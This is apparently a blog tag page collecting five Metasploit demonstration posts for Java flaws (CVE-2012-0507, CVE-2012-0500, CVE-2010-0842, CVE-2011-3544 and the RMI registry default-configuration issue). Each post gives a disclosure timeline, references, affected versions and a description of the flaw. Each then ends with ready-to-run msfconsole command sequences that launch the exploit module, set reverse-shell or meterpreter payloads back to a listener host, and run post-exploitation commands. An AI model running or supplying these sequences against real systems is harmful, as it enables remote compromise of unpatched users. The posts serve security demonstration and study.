aka wow on ZATAZ.com
Posts tagged Java
CVE-2012-0507 Java AtomicReferenceArray Type Violation Vulnerability Metasploit Demo
11 month ago
in Exploits, Metasploit
Timeline :
Vulnerability found by Jeroen Frijters
Vulnerability reported to the vendor by Jeroen Frijters the 2011-08-01
Coordinated public release of the vulnerability the 2012-02-14
Details of the vulnerability published by Jeroen Frijters the 2012-02-23
Metasploit PoC provided the 2012-03-29
PoC provided by :
Jeroen Frijters
sinn3r
juan vazquez
egypt
Reference(s) :
CVE-2012-0507
OSVDB-80724
Oracle Java SE Critical Patch Update Advisory – February 2012
Affected version(s) :
Oracle Java SE 7 Update 2 and before
Oracle Java SE 6 Update 30 and before
Oracle Java SE 5.0 Update 33 and before
Tested on Windows XP Pro SP3 with :
Oracle Java SE 6 Update 16
Internet Explorer 8
Description :
This module exploits a vulnerability due to the fact that AtomicReferenceArray uses the Unsafe class to store a reference in an array directly, which may violate type safety if not used properly. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations.
Commands :
use exploit/multi/browser/java_atomicreferencearray SET SRVHOST 192.168.178.100 SET PAYLOAD generic/shell_reverse_tcp set LHOST 192.168.178.100 exploit
CVE-2012-0500 Oracle Java Web Start Plugin Command Line Argument Injection Metasploit Demo
02 months ago
in Exploits, Metasploit
Timeline :
Vulnerability “ZDI-12-037″ reported by Chris Ries to ZDI
Vulnerability “ZDI-12-039″ reported by Anonymous to ZDI
Vulnerability reported to the vendor by ZDI the 2011-10-28 for “ZDI-12-037″
Vulnerability reported to the vendor by ZDI the 2011-11-21 for “ZDI-12-039″
Coordinated public release of the vulnerability the 2012-02-22
Metasploit PoC provided the 2012-02-23
PoC provided by :
jduck
Reference(s) :
CVE-2012-0500
OSVDB-79227
ZDI-12-037
ZDI-12-039
TSL20120214-01
Oracle Java SE Critical Patch Update Advisory – February 2012
Affected version(s) :
Oracle Java Development Kit (JDK) 6 Update 30 and prior
Oracle Java Development Kit (JDK) 7 Update 2 and prior
Oracle JavaFX 2.0.2 and prior
Oracle Java Runtime Environment (JRE) 6 Update 30 and prior
Oracle Java Runtime Environment (JRE) 7 Update 2 and prior
Tested on Windows XP Pro SP3 with :
Java 6 Update 30
Internet Explorer 8
Description :
This module exploits a flaw in the Web Start component of the Sun Java Runtime Environment. The arguments passed to Java Web Start are not properly validated, allowing injection of arbitrary arguments to the JVM. By utilizing the lesser known -J option, an attacker can take advantage of the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method allows an attacker to execute arbitrary code in the context of an unsuspecting browser user. In order for this module to work, it must be ran as root on a server that does not serve SMB. Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.
Commands :
use exploit/windows/browser/java_ws_vmargs set SRVHOST 192.168.178.100 SET PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.100 exploit sysinfo getuid
CVE-2010-0842 Java MixerSequencer Vulnerability Metasploit Demo
02 months ago
in Exploits, Metasploit
Timeline :
Vulnerability reported to ZDI by Peter Vreugdenhil
Vulnerability reported to the vendor by ZDI the 2009-12-10
Coordinated public release of the vulnerability the 2010-04-05
Details of the vulnerability and first PoC disclosed the 2010-05-21
Metasploit PoC provided the 2012-02-15
PoC provided by :
Peter Vreugdenhil
juan vazquez
Reference(s) :
CVE-2010-0842
OSVDB-63493
ZDI-10-060
Affected version(s) :
Java 6 before or equal to update 18
Tested on Windows 7 Integral with :
Java 6 Update 18
Internet Explorer 9
Description :
This module exploits a flaw within the handling of MixerSequencer objects in Java 6u18 and before. Exploitation id done by supplying a specially crafted MIDI file within an RMF File. When the MixerSequencer objects is used to play the file, the GM_Song structure is populated with a function pointer provided by a SONG block in the RMF. A Midi block that contains a MIDI with a specially crafted controller event is used to trigger the vulnerability. When triggering the vulnerability “ebx” points to a fake event in the MIDI file which stores the shellcode. A “jmp ebx” from msvcr71.dll is used to make the exploit reliable over java updates.
Commands :
use exploit/windows/browser/java_mixer_sequencer set SRVHOST 192.168.178.100 SET PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.100 exploit sysinfo getuid
CVE-2011-3544 Java Applet Rhino Script Engine Metasploit Demo
05 months ago
in Exploits, Metasploit
Timeline :
Vulnerability discovered and reported to ZDI by Michael Schierl
Vulnerability reported to vendor by ZDI the 2011-05-12
Coordinated release of the vulnerability the 2011-10-26
First exploit provided by Michael Schierl
Metasploit PoC provided the 2011-11-29
PoC provided by :
Michael Schierl
juan vazquez
Edward D. Teach
sinn3r
Reference(s) :
CVE-2011-3544
OSVDB-76500
ZDI-11-305
Oracle Java SE CPU October 2011
Affected version(s) :
JDK and JRE 7, 6 Update 27 and before
Tested on Windows XP Pro SP3 with :
Java JSE 6 Update 26
Description :
This module exploits a vulnerability in the Rhino Script Engine that can be used by a Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability affects version 7 and version 6 update 27 and earlier, and should work on any browser that supports Java (for example: IE, Firefox, Google Chrome, etc)
Commands :
use exploit/multi/browser/java_rhino set SRVHOST 192.168.178.21 set TARGET 1 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.21 exploit getuid sysinfo
Java RMI Server Insecure Default Configuration Java Code Execution
09 months ago
in Exploits, Metasploit
Timeline :
Vulnerability discovered by mihi
Metasploit exploit released the 2011-07-15
PoC provided by :
mihi
Reference(s) :
Oracle Java RMI documentation
Affected version(s) :
All JSE versions
Tested on Windows XP SP3 with :
JSE 7 (build 1.7.0-b147)
Description :
This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication.
Commands :
On windows target box : cd C:\Program Files\Java\jre7\bin start rmiregistry.exe On Metasploit box : use exploit/multi/misc/java_rmi_server set RHOST 192.168.178.48 set SRVHOST 192.168.178.21 set TARGET 1 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.21 exploit sessions -i 1 sysinfo getuid ipconfig
Recent Comments